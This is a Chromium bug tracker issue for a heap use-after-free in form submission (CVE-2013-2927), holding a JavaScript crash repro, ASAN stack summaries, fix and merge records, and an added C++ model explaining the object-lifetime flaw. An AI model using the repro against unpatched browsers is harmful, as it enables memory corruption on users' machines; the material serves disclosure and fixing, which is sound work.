
Issue 297478


Issue metadata

Status: Fixed
Owner:
Closed: Sep 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security




Heap-use-after-free in WebCore::HTMLFormElement::submit

Reported by cloudfuz...@gmail.com, Sep 24 2013

Issue description

VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of chrome.

Requires --expose-gc

VERSION
Chrome Version: asan-symbolized-linux-release-224738
Operating System: Linux 64bit

REPRODUCTION CASE
<script>
function start() {
  o179 = document.createElement('form');
  o180 = document.createElement('input');
  o180.type = 'submit';
  o179.addEventListener('submit', cb_trigger_onsubmit_25_1, false);
  // The javascript: action runs during submission and forces a garbage collection.
  o179.action = 'javascript:gc()';
  o179.appendChild(o180);
  o180.click();  // synthetic click on the submit button starts the submission
}
function cb_trigger_onsubmit_25_1() {
  // Inside the submit handler: detach the button and drop the script's only
  // reference to the form, so the Event object is the form's remaining owner.
  o179.removeChild(o180);
  o179 = null;
}
window.setTimeout("start()", 100);
</script>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: See attached stack.txt for ASAN output
 
Attachment: stack.txt (18.9 KB)

Comment 1 by ClusterFuzz, Sep 24 2013

ClusterFuzz is now working on this testcase. See https://cluster-fuzz.appspot.com/testcase?key=5045782138847232

Comment 2 by ClusterFuzz, Sep 24 2013

Summary: Heap-use-after-free in WebCore::HTMLFormElement::submit (was: Security: ASAN "heap-use-after-free" in WebCore::HTMLFormElement::submit)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5045782138847232

Uploader: ianbeer@google.com
Job Type: Linux_asan_chrome_mp

Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x61300002bd42
Crash State:
  - crash stack -
  WebCore::HTMLFormElement::submit
  WebCore::HTMLFormElement::prepareForSubmission
  - free stack -
  WebCore::FormSubmission::~FormSubmission
  WebCore::HTMLFormElement::submit
  

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96ZmNd-a02H1IgRrG9sIWBrhrJ-NNSFR3Q6YENBKS5PkiLvSKScQlng9u1a_DT_HLLaeiIhcPP48C8GfvHdAS4gX-Q_vvo12WgLV-VLpyt7FoM6TpUMXFmv3TWZYWcJjZldpCN5so6lgOqwECVhRzvOHQ3iiQ


Labels: Cr-Blink-Forms Security_Severity-High Security_Impact-Stable Security_Impact-Beta
Status: Available

Comment 4 by ClusterFuzz, Sep 24 2013

Labels: reward-topanel
ClusterFuzz thinks that this bug might be eligible for a reward! Forwarding to reward panel for consideration.

Comment 5 by ClusterFuzz, Sep 24 2013

Labels: M-29 Stability-Memory-AddressSanitizer
Adding milestone and impact labels.

Comment 6 by jww@chromium.org, Sep 25 2013

Owner: tkent@chromium.org
Status: Assigned
Kent, this looks like it touches a bunch of HTMLInputElement stuff. Can you take a look? Thanks!

FYI, you're definitely going to need --js-flags="--expose-gc" and ASAN for the repro.
Cc: ifratric@google.com
Did you see our new criteria for possibly issuing higher rewards? See http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program/reward-nomination-process
E.g., if you are able to provide a repro that faulted at an address of 0x41414141, it will qualify for the new higher rewards. Or, if you can show that you have control between free and crash points, etc.

Comment 9 by tkent@chromium.org, Sep 27 2013

Status: Started

Comment 10 by tkent@chromium.org, Sep 27 2013

> o179.addEventListener('submit', cb_trigger_onsubmit_25_1,false);
> function cb_trigger_onsubmit_25_1() {
>     o179.removeChild(o180);
>     o179=null;
> }

Only removing a FORM element from the document tree in a submit event handler doesn't cause a problem, because an Event object still has a reference to the FORM element, and the event object lives until the next GC.

> o179.action='javascript:gc()';

Unfortunately we have another chance to execute JavaScript. This gc() deletes the event object and the referenced FORM element.
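The lifetime problem described in comment 10, as an added C++ model that is not Blink code and not the r158428 patch: a form kept alive only by its Event, which is in turn kept alive only by a FormSubmission, is destroyed when the submission is torn down after a re-entrant script hook (the javascript: action standing in for gc()) has dropped the script-side references, and the submitting method then writes to `this`. The types FormElement, Event and FormSubmission, the driver runScenario, and the std::shared_ptr ownership model are assumptions standing in for Blink's RefPtr-managed objects; the hardened variant holds a strong reference to `this` across the re-entrant call, the usual "protector" idiom for this class of bug.

```cpp
// Added illustration of the lifetime bug described in comment 10; a model
// built on std::shared_ptr, not Blink code and not the fix in r158428.
#include <functional>
#include <memory>
#include <utility>
#include <vector>

struct FormElement;

// Models the DOM Event: it owns a reference to its target, the form.
struct Event {
    std::shared_ptr<FormElement> target;
};

// Models FormSubmission: it owns the Event, so while the submission exists
// the Event (and through it the form) cannot be destroyed.
struct FormSubmission {
    std::shared_ptr<Event> event;
};

struct FormElement : std::enable_shared_from_this<FormElement> {
    bool isSubmitting = false;
    // Stands in for the javascript: URL executed during submission. In the
    // report it is gc(), which frees everything script no longer references.
    std::function<void()> action;

    // Returns true if the form was still alive when the trailing state write
    // happened, i.e. whether that write was safe.
    bool submit(std::shared_ptr<Event> event, bool holdProtector) {
        // Hardened variant: a strong reference to `this` held for the whole
        // call guarantees the object outlives any re-entrant script.
        std::shared_ptr<FormElement> protector;
        if (holdProtector)
            protector = shared_from_this();

        std::weak_ptr<FormElement> self = shared_from_this();  // liveness probe only
        isSubmitting = true;
        {
            FormSubmission submission{std::move(event)};
            if (action)
                action();  // re-entrant script: drops the script-side references
        }  // ~FormSubmission -> ~Event -> last reference to the form released

        // Vulnerable variant: at this point `this` may already be freed. The
        // real bug performed the flag write unconditionally (ASAN: WRITE 1).
        bool alive = !self.expired();
        if (alive)
            isSubmitting = false;
        return alive;  // touches only locals, so it is safe even when freed
    }
};

// Drives the sequence from the testcase: script drops its reference to the
// form inside the submit handler (o179 = null), then the javascript: action
// runs gc() while the submission is in progress. All objects are constructed
// here; nothing is taken from a real DOM.
bool runScenario(bool holdProtector) {
    std::vector<std::shared_ptr<void>> scriptRoots;  // what script can still reach
    auto form = std::make_shared<FormElement>();
    auto event = std::make_shared<Event>();
    event->target = form;
    scriptRoots.push_back(form);   // o179
    scriptRoots.push_back(event);  // the Event wrapper handed to the listener

    FormElement* raw = form.get();
    raw->action = [&scriptRoots] { scriptRoots.clear(); };  // javascript:gc()

    // submit listener: o179 = null. Only the Event now keeps the form alive.
    scriptRoots.erase(scriptRoots.begin());
    form.reset();  // no native caller holds a reference either

    return raw->submit(std::move(event), holdProtector);
}

int main() {
    // Unprotected submit writes after the free (returns false); the
    // protected one keeps the form alive (returns true).
    return (runScenario(false) == false && runScenario(true) == true) ? 0 : 1;
}
```

The model uses reference counting where Blink's Event wrapper is reclaimed by V8's garbage collector, so the "free" happens at the deterministic point where the last owner lets go; the ordering it shows (script reference dropped in the handler, submission torn down after the javascript: action, then a write through `this`) matches the crash and free stacks in comment 2.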


Comment 11 by bugdroid1@chromium.org, Sep 27 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=158428

------------------------------------------------------------------------
r158428 | tkent@chromium.org | 2013-09-27T08:13:50.253600Z

Changed paths:
   M http://src.chromium.org/viewvc/blink/trunk/Source/core/html/HTMLFormElement.cpp?r1=158428&r2=158427&pathrev=158428
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/fast/forms/form-submission-crash.html?r1=158428&r2=158427&pathrev=158428
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=158428&r2=158427&pathrev=158428

Fix a crash in HTMLFormElement::prepareForSubmission.

BUG= 297478 
TEST=automated with ASAN.

Review URL: https://chromiumcodereview.appspot.com/24910003
------------------------------------------------------------------------

Comment 12 by aarya@google.com, Sep 27 2013

Status: Fixed

Comment 13 by ClusterFuzz, Sep 27 2013

Labels: Merge-Approved
Adding Merge-Approved to track merges across stable and beta branches. Please do not merge without checking with the release manager first. If the fix is not applicable for merge, change this label to Merge-NA.

Comment 14 by ClusterFuzz, Sep 27 2013

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 15 by ClusterFuzz, Sep 30 2013

ClusterFuzz has detected this issue as fixed in range 225895:225905.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5045782138847232

Uploader: ianbeer@google.com
Job Type: Linux_asan_chrome_mp

Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x61300002bd42
Crash State:
  - crash stack -
  WebCore::HTMLFormElement::submit
  WebCore::HTMLFormElement::prepareForSubmission
  - free stack -
  WebCore::FormSubmission::~FormSubmission
  WebCore::HTMLFormElement::submit
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=225895:225905

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96ZmNd-a02H1IgRrG9sIWBrhrJ-NNSFR3Q6YENBKS5PkiLvSKScQlng9u1a_DT_HLLaeiIhcPP48C8GfvHdAS4gX-Q_vvo12WgLV-VLpyt7FoM6TpUMXFmv3TWZYWcJjZldpCN5so6lgOqwECVhRzvOHQ3iiQ

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 16 by aarya@google.com, Oct 1 2013

Labels: -Merge-Approved Merge-Requested

Comment 17 by ClusterFuzz, Oct 2 2013

Labels: -M-29 M-30
Migrating old milestone labels.

Comment 18 by kareng@google.com, Oct 4 2013

Labels: -Merge-Requested Merge-Approved Release-1-M30
pls merge to M30 - branch 1599 and then switch mstone to 31 and re-request merge. ty.
Labels: -Merge-Approved -M-30 Merge-Merged-1599 M-31 Merge-Requested
Labels: -Merge-Requested Merge-Approved

Comment 22 by bugdroid1@chromium.org, Oct 8 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=158998

------------------------------------------------------------------------
r158998 | tkent@chromium.org | 2013-10-07T00:23:53.878814Z

Changed paths:
   M http://src.chromium.org/viewvc/blink/branches/chromium/1599/Source/core/html/HTMLFormElement.cpp?r1=158998&r2=158997&pathrev=158998
   A http://src.chromium.org/viewvc/blink/branches/chromium/1599/LayoutTests/fast/forms/form-submission-crash.html?r1=158998&r2=158997&pathrev=158998
   A http://src.chromium.org/viewvc/blink/branches/chromium/1599/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=158998&r2=158997&pathrev=158998

Merge 158428 "Fix a crash in HTMLFormElement::prepareForSubmission."

> Fix a crash in HTMLFormElement::prepareForSubmission.
> 
> BUG= 297478 
> TEST=automated with ASAN.
> 
> Review URL: https://chromiumcodereview.appspot.com/24910003

TBR=tkent@chromium.org

Review URL: https://codereview.chromium.org/26200002
------------------------------------------------------------------------

Comment 23 by bugdroid1@chromium.org, Oct 8 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=159067

------------------------------------------------------------------------
r159067 | tkent@chromium.org | 2013-10-08T00:23:20.774285Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/branches/chromium/1650/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=159067&r2=159066&pathrev=159067
   M http://src.chromium.org/viewvc/blink/branches/chromium/1650/Source/core/html/HTMLFormElement.cpp?r1=159067&r2=159066&pathrev=159067
   A http://src.chromium.org/viewvc/blink/branches/chromium/1650/LayoutTests/fast/forms/form-submission-crash.html?r1=159067&r2=159066&pathrev=159067

Merge 158428 "Fix a crash in HTMLFormElement::prepareForSubmission."

> Fix a crash in HTMLFormElement::prepareForSubmission.
> 
> BUG= 297478 
> TEST=automated with ASAN.
> 
> Review URL: https://chromiumcodereview.appspot.com/24910003

TBR=tkent@chromium.org

Review URL: https://codereview.chromium.org/26317004
------------------------------------------------------------------------
Labels: CVE-2013-2927
Labels: -reward-topanel reward-unpaid reward-2000
$2000 since there is control between the free and use, but it is inside the node heap partition.
Labels: -reward-unpaid reward-inprocess
OK, kicked off payment for this one (and the rest). Expect something in a few weeks. Thanks again cloudfuzzer :)

Comment 27 by ClusterFuzz, Nov 13 2013

Labels: Hotlist-Webkit
Cc: ddkil...@apple.com

Comment 29 by ClusterFuzz, Feb 6 2014

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-inprocess

Comment 31 by ClusterFuzz, Feb 2 2016

Labels: -Security_Impact-Beta

Comment 32 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 33 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Comment 36 by sheriffbot@chromium.org, Jul 29

Labels: Pri-1
